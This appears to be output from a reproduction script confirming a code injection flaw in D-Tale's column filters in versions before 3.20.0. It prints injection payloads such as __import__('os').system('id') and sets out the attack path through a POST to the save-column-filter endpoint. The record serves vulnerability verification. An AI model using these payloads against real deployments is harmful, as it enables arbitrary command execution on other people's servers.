[*] D-Tale RCE Vulnerability Reproduction
[*] Testing if malicious column filters can execute arbitrary code

[+] Test DataFrame:
      name  age  salary     city
0    Alice   25   50000      NYC
1      Bob   30   60000       LA
2  Charlie   35   70000  Chicago
3     Dave   40   80000  Houston

[1] Demonstrating pandas DataFrame.query() with python engine...
    The python engine evaluates expressions as Python code

    [OK] Safe query '`age` > 30' returned 2 rows

[2] Testing StringFilter with code injection payload...
    [WARNING] Filter accepted malicious value!
    [WARNING] Generated query: `name` == "__import__('os').system('echo RCE')"
    [CRITICAL] Malicious code appears in query string!
    [CRITICAL] Query: `name` == "__import__('os').system('echo RCE')"

[3] Testing OutlierFilter with direct query injection...
    [WARNING] OutlierFilter accepted raw query!
    [CRITICAL] Query content: __import__('os').system('id')
    [CRITICAL] Raw malicious code in query - RCE possible!

[4] Checking for security validation in column_filters.py...
    [VULNERABLE] ColumnFilterSecurity class NOT found
    [VULNERABLE] _DANGEROUS_PATTERNS regex NOT found
    [VULNERABLE] validate_query_safety() NOT found in query.py
    [VULNERABLE] _DANGEROUS_QUERY_PATTERNS NOT found in query.py

============================================================
FINAL ASSESSMENT:
============================================================
[RESULT] VULNERABILITY CONFIRMED
[RESULT] Version < 3.20.0 without input validation detected
[RESULT] Malicious column filters can inject code into pandas.query()

Attack Vector:
  1. Attacker sends POST to /dtale/save-column-filter/<data_id>
  2. Malicious code embedded in 'cfg' parameter's value/raw fields
  3. Query is built and passed to pandas.DataFrame.query(engine='python')
  4. Python evaluates the malicious expression, executing arbitrary code